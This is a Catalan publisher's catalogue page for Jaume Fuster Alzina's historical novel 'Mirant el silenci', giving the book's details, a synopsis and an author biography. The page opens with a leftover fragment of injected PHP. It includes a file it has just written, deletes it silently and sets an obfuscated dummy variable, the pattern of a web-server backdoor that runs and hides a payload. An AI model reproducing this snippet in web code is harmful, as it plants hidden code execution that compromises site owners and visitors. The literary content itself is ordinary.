");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Mirant el silenci
Cercador d'Obres
ORDENAR:
Començar recerca

Mirant el silenci

Fuster Alzina, Jaume

Prologuista:
Epíleg: Pere Joan i Tous
Col·lecció:
Magatzem Can Toni
Tema:
Creació
Pàgines:
260
PVP:
20.00
ISBN:
978-84-18441-30-1
Data d'Edició:
14/06/2021
Una novel·la històrica que transita entre les darreres guerres colonials i l’inici del turisme de masses.


Sinopsi
Empès per la misèria, el major dels Fiol, com tants d'altres, emigra a Amèrica on fa fortuna i torna amb les butxaques plenes i, el que és pitjor, amb el cap ple d'idees empresarials modernes que empelta al seu nebot. Aquest figura com un dels pròcers de l’enriquiment de Sant Andreu, i per a altres com un excel·lent exemple de cacic. Ah!, el major dels Fiol també torna amb una dona de bandera.


En Jaume Fuster s’afegeix a la nòmina de novel·listes que necessiten entendre la Gran Transformació que succeí als voltants de la meitat del segle passat, ens convida a visitar el llogaret de Sant Andreu, de bell antuvi plaça d’estiuejants i refugi de turistes fugitius, i ens presenta la família Fiol, protagonista dels canvis que afluïren al nucli turístic en què s'anà convertint.


Llegir les primeres pàgines en PDF


Jaume Fuster Alzina
(Cala Rajada, 1946).Membre de Cap Vermell i filòleg, com a glosador és l’autor de l’Argument de Sant Antoni entre els anys 1992 i 1997, i del 2004 ençà, a banda de nombroses col·laboracions amb el pseudònim Es pastor de Son Perdiu. En aquest camp ha guanyat els premis Pau Sarol (Sóller) i Festa des Vermar (Binissalem). Ha publicat el llibre de poemes El vent de les paraules i les obres de teatre Un geni, aproximadament (2000), Capdepera, 700 anys (2000), (totes dues estrenades pel grup Es Mussol). Així mateix, ha publicat el treball Els malnoms de Capdepera (2001) i Torcebraç (2012). Com a prosista, ha guanyat el premi Ploma de Ferro i el Premi Artà de narrativa curta. Celistre. Cala Rajada en blanc i negre (2019) i Mirant el silenci (2021) són les seves darreres obres narratives.

Recomanar
Comentar
Comentaris (0)